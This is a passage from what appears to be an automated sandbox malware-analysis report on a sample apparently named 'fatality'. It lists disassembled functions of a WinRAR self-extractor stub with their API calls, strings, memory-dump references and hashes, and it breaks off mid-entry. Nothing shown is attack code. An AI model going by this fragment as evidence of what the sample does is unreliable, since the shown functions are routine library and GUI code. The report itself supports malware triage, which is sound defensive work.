                                                                                                                                                            • Opcode ID: 2dcfdf4ca9a84a02796da274314605ba7855b49495fff76d8e0e4c29ad8e175a
                                                                                                                                                            • Instruction ID: 2c15a0912a87cfa13e763f59a7676fd48a83bd5ca1c3cbba9d0902b3c2898508
                                                                                                                                                            • Opcode Fuzzy Hash: 2dcfdf4ca9a84a02796da274314605ba7855b49495fff76d8e0e4c29ad8e175a
                                                                                                                                                            • Instruction Fuzzy Hash: DFB18C71900209EFCF25DFA4C885AAEBBBDFF48310F14855AE8056B292D731DA52CF91
                                                                                                                                                            Function 008F9711 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 126COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _wcslen.LIBCMT ref: 008F9736
                                                                                                                                                            • _wcslen.LIBCMT ref: 008F97D6
                                                                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008F982D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcslen$CreateGlobalStream
                                                                                                                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                                            • API String ID: 1938992887-4209811716
                                                                                                                                                            • Opcode ID: dc53a8b291a2632535edcf73784155d2c666454219ecc8d734fa4defab056984
                                                                                                                                                            • Instruction ID: 1e10974380862105a12d387f260a545d2ca7f17484437609fb51fb8a5d5e58c9
                                                                                                                                                            • Opcode Fuzzy Hash: dc53a8b291a2632535edcf73784155d2c666454219ecc8d734fa4defab056984
                                                                                                                                                            • Instruction Fuzzy Hash: F53157326183097FD725AF74DC06FBB779CEF82364F10411DF642D61C2EB609A4482A6
                                                                                                                                                            Function 008E2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _swprintf.LIBCMT ref: 008E2536
                                                                                                                                                              • Part of subcall function 008F05DA: _wcslen.LIBCMT ref: 008F05E0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _swprintf_wcslen
                                                                                                                                                            • String ID: ;%u$x%u$xc%u
                                                                                                                                                            • API String ID: 2292043294-2277559157
                                                                                                                                                            • Opcode ID: 59d6dcf550f11a5224f51d509546649945ada216990e0743deccef8ae0e57e0f
                                                                                                                                                            • Instruction ID: 2cc2fbb16a55d48249a0d167523ae59601b3eafb580755027bc0385ca9f9dd01
                                                                                                                                                            • Opcode Fuzzy Hash: 59d6dcf550f11a5224f51d509546649945ada216990e0743deccef8ae0e57e0f
                                                                                                                                                            • Instruction Fuzzy Hash: 3CF11970A083C49BDB25DB2A8495BFA7799FF92304F08057DED86DB283CB648945C763
                                                                                                                                                            Function 008EAF24 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 210COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                                                            • API String ID: 3519838083-3505469590
                                                                                                                                                            • Opcode ID: 52ae965ef5e68f1a7d09e6d172e515f9935fbca4a1ba01d7309821375da6b92d
                                                                                                                                                            • Instruction ID: 9a8a44a137214639f0f4f15dc904cfcb0787916129efe3cb7098bf9680c4f946
                                                                                                                                                            • Opcode Fuzzy Hash: 52ae965ef5e68f1a7d09e6d172e515f9935fbca4a1ba01d7309821375da6b92d
                                                                                                                                                            • Instruction Fuzzy Hash: 9D718C70B00659AFDB14DFA9CC959AFBBB8FF89714B004559E512E72A0CB30AD41CB60
                                                                                                                                                            Function 008F9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                                                            • API String ID: 176396367-3568243669
                                                                                                                                                            • Opcode ID: ed49d1af9b1e135b1c82a9c23d25b485952eca92a6b7c0f1cb77ad745234f484
                                                                                                                                                            • Instruction ID: 945adf4f49c796503c15cd866fc6c5461adb56115a923b3801935ef721d52c1e
                                                                                                                                                            • Opcode Fuzzy Hash: ed49d1af9b1e135b1c82a9c23d25b485952eca92a6b7c0f1cb77ad745234f484
                                                                                                                                                            • Instruction Fuzzy Hash: 95511A6674132F95DB30AA39981177673E4FFA5794F79041AFBC1CB1C0FBA58C818262
                                                                                                                                                            Function 00902900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00902937
                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0090293F
                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 009029C8
                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 009029F3
                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00902A48
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                            • Opcode ID: 2385a9f1833397ebc1bed4dc3dd48c73b1de519cc40d880f104191961475cb45
                                                                                                                                                            • Instruction ID: 9d65c54ef10459d9f02c26b2a971966ce23cd3ef06a1f3960faf65ec17611e9b
                                                                                                                                                            • Opcode Fuzzy Hash: 2385a9f1833397ebc1bed4dc3dd48c73b1de519cc40d880f104191961475cb45
                                                                                                                                                            • Instruction Fuzzy Hash: F4418034B00208AFCF14DF68C889A9EBBB9AF84324F14C155E825AB3D2D7719A55CB91
                                                                                                                                                            Function 008F9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 008F9EEE
                                                                                                                                                            • GetWindowRect.USER32(?,00000000), ref: 008F9F44
                                                                                                                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 008F9FDB
                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 008F9FE3
                                                                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 008F9FF9
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$Show$RectText
                                                                                                                                                            • String ID: RarHtmlClassName
                                                                                                                                                            • API String ID: 3937224194-1658105358
                                                                                                                                                            • Opcode ID: 290ef60bf6d79670f94697746f8b3ec66c0d9be9b31f65f5d347bc0a05b876a3
                                                                                                                                                            • Instruction ID: 92011f52ebdbe69a9181aba912c9ac34684c2079544b1e9121a6486e1d78c715
                                                                                                                                                            • Opcode Fuzzy Hash: 290ef60bf6d79670f94697746f8b3ec66c0d9be9b31f65f5d347bc0a05b876a3
                                                                                                                                                            • Instruction Fuzzy Hash: 7941BE7500C218EFCB215F74DC48F6BBBA8FB89715F008559FA4ADA056CB34E904DB62
                                                                                                                                                            Function 008F9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                            • API String ID: 176396367-3743748572
                                                                                                                                                            • Opcode ID: 41e7976050b9b66be009d0f6e64e2410bdcc0a2a73bcd5490a7aa6d85dad8b79
                                                                                                                                                            • Instruction ID: 7389de393d3269fec91fc806e57eb42b5dd0e992173eea689edae28b5edbf3c1
                                                                                                                                                            • Opcode Fuzzy Hash: 41e7976050b9b66be009d0f6e64e2410bdcc0a2a73bcd5490a7aa6d85dad8b79
                                                                                                                                                            • Instruction Fuzzy Hash: A9315E3674435D5AD630AB649C42B7673A8FBD0724F50841FF6C6C72D0FB91AD9083A1
                                                                                                                                                            Function 0090C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 0090C868: _free.LIBCMT ref: 0090C891
                                                                                                                                                            • _free.LIBCMT ref: 0090C8F2
                                                                                                                                                              • Part of subcall function 00908DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0090C896,?,00000000,?,00000000,?,0090C8BD,?,00000007,?,?,0090CCBA,?), ref: 00908DE2
                                                                                                                                                            • _free.LIBCMT ref: 0090C8FD
                                                                                                                                                            • _free.LIBCMT ref: 0090C908
                                                                                                                                                            • _free.LIBCMT ref: 0090C95C
                                                                                                                                                            • _free.LIBCMT ref: 0090C967
                                                                                                                                                            • _free.LIBCMT ref: 0090C972
                                                                                                                                                            • _free.LIBCMT ref: 0090C97D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free$FreeHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2929853658-0
                                                                                                                                                            • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                                            • Instruction ID: 4808ef5e11e600d652fcd1b5d3d40d2713f33f1b3ce5701fd2ce37a11b8f08d5
                                                                                                                                                            • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                                            • Instruction Fuzzy Hash: 5B1121B1690B05AEE520B7B1CC0BFCB7BAC9F84F00F408E15B6DD660D2DA75B5058754
                                                                                                                                                            Function 008EC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008F05DA: _wcslen.LIBCMT ref: 008F05E0
                                                                                                                                                              • Part of subcall function 008EB92D: _wcsrchr.LIBVCRUNTIME ref: 008EB944
                                                                                                                                                            • _wcslen.LIBCMT ref: 008EC197
                                                                                                                                                            • _wcslen.LIBCMT ref: 008EC1DF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcslen$_wcsrchr
                                                                                                                                                            • String ID: .exe$.rar$.sfx
                                                                                                                                                            • API String ID: 3513545583-31770016
                                                                                                                                                            • Opcode ID: 532638254193dc2962b165b8e583ccfa677233a2db95a15878f82a61d1a36590
                                                                                                                                                            • Instruction ID: 63f489fa509cb17a9619fae19cb0ae5cca242ed125a018dcaaba961eca644c77
                                                                                                                                                            • Opcode Fuzzy Hash: 532638254193dc2962b165b8e583ccfa677233a2db95a15878f82a61d1a36590
                                                                                                                                                            • Instruction Fuzzy Hash: D84128219047D9D9C735AF798802A7BB3B8FF42748F10490EF991EB182EB504D83C356
                                                                                                                                                            Function 008FB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • LoadBitmapW.USER32(00000065), ref: 008FB6ED
                                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 008FB712
                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 008FB744
                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 008FB767
                                                                                                                                                              • Part of subcall function 008FA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 008FA762
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Object$Delete$BitmapCreateGlobalLoadStream
                                                                                                                                                            • String ID: ]
                                                                                                                                                            • API String ID: 3658976889-3352871620
                                                                                                                                                            • Opcode ID: 923faad93ebbeb9bb229af4eb228a4f9d3526ce9cda13052b4e5386e3a599555
                                                                                                                                                            • Instruction ID: 7583e32cd0581154a0d9d1ac6ac83256d0b7017ef8d6461d92c3f73189b106bd
                                                                                                                                                            • Opcode Fuzzy Hash: 923faad93ebbeb9bb229af4eb228a4f9d3526ce9cda13052b4e5386e3a599555
                                                                                                                                                            • Instruction Fuzzy Hash: 6901007A500219A7C7127BB88C49E7F7BB9FFC1B62F180011FA04E7291DF21CD0552A2
                                                                                                                                                            Function 008FD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008E1316: GetDlgItem.USER32(00000000,00003021), ref: 008E135A
                                                                                                                                                              • Part of subcall function 008E1316: SetWindowTextW.USER32(00000000,009135F4), ref: 008E1370
                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 008FD64B
                                                                                                                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 008FD661
